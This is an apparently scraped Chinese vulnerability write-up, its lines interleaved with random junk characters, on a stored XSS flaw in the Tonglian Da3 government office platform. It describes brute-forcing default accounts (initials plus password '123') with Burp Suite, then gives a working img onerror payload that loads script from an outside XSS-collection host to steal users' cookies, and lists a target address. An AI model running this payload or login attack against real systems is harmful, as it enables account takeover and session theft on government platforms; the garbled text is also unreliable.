2 s, K8 O. i% K
* ]" O, |( W" m6 U 同联Da3协同办公平台后台通用储存型xss漏洞
. a- z# [- w; B
a/ h$ d) i- q" Q' T* S
3 ~ U6 A; I) t8 [ 平台简介:6 F4 p7 n. Y# p" [# e: ]' G
: p+ M! d' @2 f/ [( M, ~ , \4 n2 x9 d6 m8 `
1 P+ p' V D0 H5 Q7 W
& y) q% Z% ^ Q* L& C1 n
3 g; X$ W: G: v7 w' c7 e1 @ 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
( O/ y" X. G0 x) N9 y- P5 s1 t同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
4 @7 [ C% e4 ]; Y5 ]6 X0 b1 W同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
0 A) x+ m+ {! C: i$ p: m/ a
7 w, A! H' B8 n; j$ B' v
- c6 t& N7 y/ q" P
6 f+ V+ W5 B0 i/ T2 Z: y" \+ k% E
- o* I! K+ i) {$ R, l ( q. F% ]: E1 ~0 Z/ H5 W
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:4 r+ J- i8 I3 o6 C3 L9 {+ E
$ U1 G7 O5 e. l+ F) e# O5 e
# r5 Q/ b5 s# _ r* T
% U7 q" ]1 [, E6 ^* t# ?) O
" W& X% _, d" x) z
) D" o' r% L3 }! i" T http://1.1.1.1:7197/cap-aco/#(案例2-): _. ^7 w1 J8 I
% L0 ]# M/ e, s% l3 g
0 K; u7 e4 J# r; G! S http://www.XXOO.com (案例1-官网网站)* p1 W8 ?5 D8 N5 b
2 B9 e; T' q; V* B, h1 b. L % @2 [" I/ d6 u+ B5 y, u' f
漏洞详情:
" F g9 M' c3 M& |8 q) G
8 v+ L6 H) O5 n ! f& y# f! I% ]8 W6 A7 U
案例一、5 W7 d( q2 v8 z1 | ~# Y5 B4 }
% V" B& b; g1 A* m . B$ A5 V, W$ i8 l8 K ?
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
! A! `: r! o. q- |
& _, o9 Y" d0 B; d
6 S3 j0 _$ j, O; T
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
5 A' J5 A5 R" t( y- Q& B& U
, r$ u; s- D1 p' j/ X
! t: ]) S2 b0 B9 v & o8 y: ^9 Q1 ~! m: ^
# X N5 }" |; H7 u- p 1 z S6 U2 j3 \
* o! W9 c- ?! a5 |
4 Q9 _# [7 G3 b- \: {+ [9 X0 s: n # G, k5 h/ N$ q: @. a2 G& N: |
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
) e- n; q) N% B3 A% {, Z) s' |
7 M( M# K; }% G8 P; Z; u; X $ O9 c P1 A: R# h& A. H7 ?
9 \3 I( E3 K1 t- }2 }
% f; j7 B9 F0 _/ v/ o) Y: `" m
l# P2 ?& f' E0 \
- {9 L q* e0 T; u, q
, S4 {4 ` {' _4 R; C0 K
, G; x5 `. A. R5 \8 U* p- R# `1 I 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 4 [# ] W6 i5 T+ t4 e" ~
0 d# I+ ?5 p: E7 Z4 [
& l' d. L' D. M# Y6 K; E n 6 c% b2 `$ C B7 t( p
) ~6 ^/ y* U+ y/ d5 `
9 L/ d9 S' ]6 l* }7 c; z" \5 o <img src=x
& A% i1 ~: e8 j8 c, gonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
! c% `% b% Q7 q" x8 _- C& {
" S, S" B$ i1 s3 h- {
$ K3 @9 u s, v6 f. A. ]
! s1 p, Y6 f5 g, \$ A
$ @* S) d. V) C# C, ]' m' p6 a
" Z% h# f! z. \" v: W 然后发送,接收cookie如图:
3 d7 A2 b W! L' t( t- o' \
- V$ d% u5 f/ {, s2 j* l
4 r! p. _, s7 o& v2 L" T 5 ]9 B4 W1 m) z$ B$ G& j6 J$ b
6 R7 {" F% p& @5 z+ `% r
$ z. M2 E/ B8 o$ P5 K7 q
) I2 a1 w7 A* i* x) H' s9 i" Z
; F! \ e' z- L, {8 |5 ~" @# i
- R' C- U( a- _ % h& @! w, E* v5 Y# C. O: @
1 u, x: x! ~1 r' h+ L3 R
% x# ` U" `! A
% ^/ Y' H1 y% v' Q8 v
, L% J% j, H! b
( ~$ J4 U. D) i6 h' K
" M5 G% _ a/ i% k$ x+ Y4 v
+ _& Y! b, b& A. W1 j2 W 7 K( `3 T; _, e. N8 J3 A$ [
2 p9 k/ P% g# D' `' a
) f, M" y# J8 h& S* ?. \" ~+ k
. R& K+ J, Q. i4 f- N- ^
; @6 ?) `: O* A: S* |) [
6 p) l( |1 V4 i
( S& S* Q' Q" x! a1 J, m9 ^ 案例2、
/ g5 R* [8 G6 v, |5 y& M
: W/ S5 _5 i4 c
9 Y& ~3 `, _1 q2 b$ F1 W 前面步骤都一样,下面看效果图: 9 b' [" M' [: }( M6 T- V
' Q% \5 _" a+ C2 @5 t
6 M, Z; e3 l/ Z; z0 B7 Y. ]
7 }' k9 h2 e- O
9 S; {' m7 S$ ^; p4 O4 m6 B
$ ^) D5 Z$ M# _
, a9 z* F" R! Q% e0 J. p! ]5 h y
: A- X4 w& m* F) O# r
; T4 c4 y/ h, }0 W
; ]+ b5 _+ J5 s: ^, T, _7 f
4 L6 p& x. Y6 T7 [" S& q4 A 8 y: r, O2 n# N! ~ ?
* N1 _# E$ k! |2 @
1 |' a; ?$ m" c8 q
+ M }3 V \0 k3 J2 ]
4 P2 { ~, N/ l6 Q. `
% C3 H/ y7 o1 I5 b
* x5 \; C! j; N, q9 R' h- {/ w, Y * k1 H& a# l5 m: W/ J8 U" z
4 M+ m9 g# ~6 K( v : b$ |, s+ N, C: o
6 E: r6 M% ~& b# n5 ?
* ]& O$ j8 r3 b; Y) ~
7 k5 ?: [# M. H; c/ T$ ^% E- c ( H/ ?- I z) V+ F' E1 S6 C
3 g7 \& ?2 J; {2 q) Y
5 \) r) ?! M1 m C, I* C 4 ]* k' P: A( u/ I
; y# A: v* n. Y5 D5 \: U) K